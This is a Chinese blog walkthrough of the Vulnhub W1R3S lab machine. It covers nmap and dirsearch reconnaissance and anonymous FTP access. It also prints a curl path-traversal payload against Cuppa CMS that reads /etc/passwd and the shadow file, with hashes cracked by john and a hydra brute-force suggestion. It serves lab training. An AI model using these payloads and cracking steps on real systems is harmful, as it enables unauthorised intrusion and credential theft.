首页 > 其他分享 >Vulnhub W1R3S: 1.0.1

Vulnhub W1R3S: 1.0.1

时间:2024-11-13 18:19:47浏览次数:1  
标签:1.0 .. 231.133 192.168 -- wordpress Vulnhub txt W1R3S

Vulnhub W1R3S: 1.0.1

0x01:端口扫描

主机发现,靶机ip:192.168.231.133

nmap -sn 192.168.231.0/24

-sn 仅主机扫描

/24 扫描c段

image-20241106192844984

详细全端口扫描

nmap -sT -sC -sV -O -p21,22,80,3306 192.168.231.133 -oA /root/scan/1/

-sT: 以TCP进行扫描;

-sC:使用 nmap 的默认脚本集合进行扫描

-sV:启用版本探测;

-O:启用操作系统探测

-p:指定端口

-oA:将扫描结果以三种格式(普通、XML、grepable)输出,并保存在 /root/scan/1/ 文件夹中。

image-20241106192815726

发现有4个服务,21ftp,22ssh,80http,3306mysql,而且ftp可以匿名登录

对web端口进行漏洞扫描

nmap --script=vuln -p80 192.168.231.133

--script=vuln 进行漏洞扫描

image-20241106193009426

有wordpress的login界面

0x02:ftp渗透

使用anonymous进行匿名登录

image-20241106193648409

提示我们使用binary模式去传输文件

image-20241106194247732

我们在content目录下找到有三个txt文件,我们全部get下来

我们再把其他目录的文件也get下来,我们依次看

image-20241106204835779

image-20241106204857437

image-20241107080451552

image-20241107080543889

image-20241107080659048

从以上图片中我们可以得知以下信息:

​ 1.得到两串字符串

​ 2.The W1R3S.inc

​ 3.一个hint

​ 4.员工名单

我们先分析02.txt中的字符串,使用hash-identifier识别出第一串为md5,第二串为base64

image-20241107083142244

image-20241107082858694

0x03:web渗透

首先扫目录

dirsearch -u http://192.168.231.133/

image-20241107083829728

扫到了之前的wordpress登录页,然后administrator有后台,我们继续扫admin子目录

dirsearch -u http://192.168.231.133/administrator

image-20241107085127910

我们再扫wordpress子目录

dirsearch -u http://192.168.231.133/wordpress

image-20241107085441824

我们现在就已经扫描到了以下几个有价值目录

/administrator/installation
/administrator/templates
/wordpress/wp-content/upgrade
/wordpress/wp-content/uploads
/wordpress/wp-login.php

我们进去一个一个看

image-20241107112114845

使用了cuppa CMS,查看漏洞

searchsploit cuppa
searchsploit -m php/webapps/25971.txt

image-20241107112545867

image-20241107112800448

image-20241107113127621

但是没回显,这怎么办呢,我们试试post传参或者curl呢

image-20241107114742586

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.231.133/administrator/alerts/alertConfigField.php

-s:让 curl 在执行过程中不输出任何进度信息或错误信息,只返回请求的结果。

--data-urlencode:表示将请求数据进行 URL 编码并以 POST 请求的形式发送。--data-urlencode 是对数据进行 URL 编码的选项,可以防止一些特殊字符(如 &? 等)干扰请求格式。

image-20241107193016442

看来两者都可以,我们看到w1r3s这个用户是可以登录的,那我们继续拿shadow

image-20241107193516256

然后我们unshadow它

unshadow passwd.txt shadow.txt > password.txt

最后john破解

john password.txt

image-20241107193639617

成功拿到密码!

0x04:权限提升

我们ssh登录到w1r3s用户下

查看权限

image-20241107194208674

无root权限,我们先看看sudo允许执行什么命令

sudo -l

image-20241107194821503

纳尼!提权后我们到root目录下查看

image-20241107194946331

0x05:思考补充

看了fyf大佬的wp后,做几个补充

1.john历史问题,使用--show即可

2.我们之前在ftp上get了员工名单,可以hydra爆破密码

标签:1.0,..,231.133,192.168,--,wordpress,Vulnhub,txt,W1R3S
From: https://www.cnblogs.com/kelec0ka/p/18544516

相关文章

  • vulnhub-DC-1详细笔记
    1.靶机DC-1和kali开启nat模式2.kali扫描同一子网段的存活主机3.确定了靶机的ip为192.168.137.130,在来一遍详扫4.发现web资产5.使用wapp查看资产6.查看有没有Drupal7的漏洞7.发现有该漏洞,那我们就使用msf利用该漏洞,searchdrupal7查询漏洞,然后一个个尝试编......
  • C#/.NET/.NET Core技术前沿周刊 | 第 12 期(2024年11.01-11.10)
    前言C#/.NET/.NETCore技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NETCore领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。欢迎投稿、推荐或自荐优质文章、项目、学习资源等。每......
  • 服务器漏洞修复:TLS 1.0 已启用、HSTS、CSP
    1、TLS1.0已启用描述:此Web服务器支持通过TLS1.0加密。TLS1.0不被认为是“强密码术”。根据PCI数据安全标准3.2(.1)的定义和要求,在保护从网站往返的敏感信息时,TLS1.0并不被认为是"强加密"。根据PCI,"2018年6月30日是禁用SSL/早前TLS并实施更安全的加密协......
  • KubeSphere 社区双周报| 2024.10.25-11.07
    KubeSphere社区双周报主要整理展示新增的贡献者名单和证书、新增的讲师证书以及两周内提交过commit的贡献者,并对近期重要的PR进行解析,同时还包含了线上/线下活动和布道推广等一系列社区动态。本次双周报涵盖时间为:2024.10.25-11.07。贡献者名单新晋KubeSpherecontribu......
  • C#/.NET/.NET Core技术前沿周刊 | 第 12 期(2024年11.01-11.10)
    前言C#/.NET/.NETCore技术前沿周刊,你的每周技术指南针!记录、追踪C#/.NET/.NETCore领域、生态的每周最新、最实用、最有价值的技术文章、社区动态、优质项目和学习资源等。让你时刻站在技术前沿,助力技术成长与视野拓宽。欢迎投稿、推荐或自荐优质文章、项目、学习资源等......
  • 11.08
    感觉写的有点意识流。A.BZOJ5176把\(-1/1\)转化为\(0/1\),问题就变为一个格子和它相邻四个格子异或和为\(0\)。容易发现第一行的状态确定了,整个网格的状态就确定了。对于给定的\(m\)个格子,其实就是解\(m\)个异或方程,但是我们还需要让我们的状态合法,而合法的等价条件为......
  • SpringBoot项目编译报错 类文件具有错误的版本 61.0, 应为 52.0
    springboot项目在编译时报错:/Users/Apple/Developer/art/caicai/cai-api/dubbo-samples/1-basic/dubbo-samples-spring-boot/dubbo-samples-spring-boot-provider/src/main/java/org/apache/dubbo/springboot/demo/provider/ProviderApplication.java:22:32java:无法访问......
  • 《DNK210使用指南 -CanMV版 V1.0》第三十六章 image图像色块追踪实验
    第三十六章image图像色块追踪实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.htm......
  • 11.08学习
    importrequestsr2=requests.request('put','http://httpbin.org/put',data='wangluo210102')d3={'banji':'wangluo210102'}#print(r2.text)r3=requests.post('http://httpbin.org/post',data=d3)#print(r3......
  • 11.06
    发现自己对于一些不用动脑子的数据结构题还是有微弱的冲击力的。A.BZOJ3722为什么想不到????????????????????????先不考虑\(0\)跑一遍,每个非叶结点取其子结点中\(-1,-2\)的众数,若相等则为\(0\)。此时若根节点为\(-1\),那么其有偶数个值为\(0\)的儿子,对于每个\(0\)第一个对它子树中为\(0\)......